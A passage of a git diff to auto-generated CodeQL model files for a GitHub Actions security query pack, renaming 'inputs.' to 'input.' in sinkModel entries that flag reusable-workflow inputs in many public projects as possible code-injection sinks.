["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "input.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index c9af1a40ddc2..8d9af1a4e152 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "inputs.yarn-args", "code-injection", "generated"] \ No newline at end of file + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 863bc645d989..47c09bf4f638 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.env", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.includes", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.tags", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.kinds", "code-injection", "generated"] - - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.pkgs", "code-injection", "generated"] \ No newline at end of file + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 6e898a4e4524..4ff0273b47a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.storage", "code-injection", "generated"] - - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index a08a96a897e8..ba53c900ce87 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.context", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.tags", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-name", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-uuid", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging-repo", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging", "code-injection", "generated"] \ No newline at end of file + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index f7aafb134559..e43a220a2780 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.test", "code-injection", "generated"] - - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index 6107ae0e57ce..dd20d3100794 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image-aio", "code-injection", "generated"] - - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image", "code-injection", "generated"] \ No newline at end of file + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 74e0182cc4f6..3b9777b3f3a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.amazonflag", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.magiskver", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.root", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.gapps", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.amazonflag", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.magiskver", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.root", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.gapps", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 4bbd06a86f57..3561bd15c366 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "inputs.pr_number", "code-injection", "generated"] \ No newline at end of file + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 59bdab8f39ba..29da5a83b629 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "inputs.qt_backend", "code-injection", "generated"] \ No newline at end of file + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 6988e25d41c3..9b92197cf5d9 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.target_platform", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.fprime_location", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.default_target_ref", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.target_repository", "code-injection", "generated"] \ No newline at end of file + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.target_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index 3c025f59b787..cbed3964cffd 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "inputs.invoke_context_name", "code-injection", "generated"] \ No newline at end of file + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 5de0d170d40a..29b47c043360 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.with_default", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_optional", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_optional", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_optional", "code-injection", "generated"] \ No newline at end of file + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 19d38d1241d1..3c406b3bc0e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "inputs.build_flags", "code-injection", "generated"] \ No newline at end of file + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index b1c787677a6b..3a94887f8ffb 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.custom_run_id", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.non_validator_mode", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_optimism_options", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.network", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_options", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.cl_client", "code-injection", "generated"] \ No newline at end of file + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.cl_client", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 249c734f55bb..5198d5f418a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "inputs.agent_version", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "inputs.test_mode", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "inputs.agentVersion", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.dry-run", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.prefix", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "input.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 46951b5436d9..e3694a389735 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "inputs.page", "code-injection", "generated"] - - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "inputs.agent-ref", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index cd1d0f318ef5..f6f33154581e 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.changelog_file", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.workflows", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.changelog_file", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.release_type", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 4055874a790f..34efc8414d89 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] \ No newline at end of file + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index bccd7271b08a..71866026ef91 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.dry_run", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] \ No newline at end of file + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 56528159143a..83d241d21c0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.shard", "code-injection", "generated"] - - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.db", "code-injection", "generated"] \ No newline at end of file + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index c4a9b07ed997..3021de125684 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -3,18 +3,18 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.docker_image", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.terraform_workspace", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_hubspot_embed", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_mail_server_domain", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_widget_embed_path", "code-injection", "generated"] - 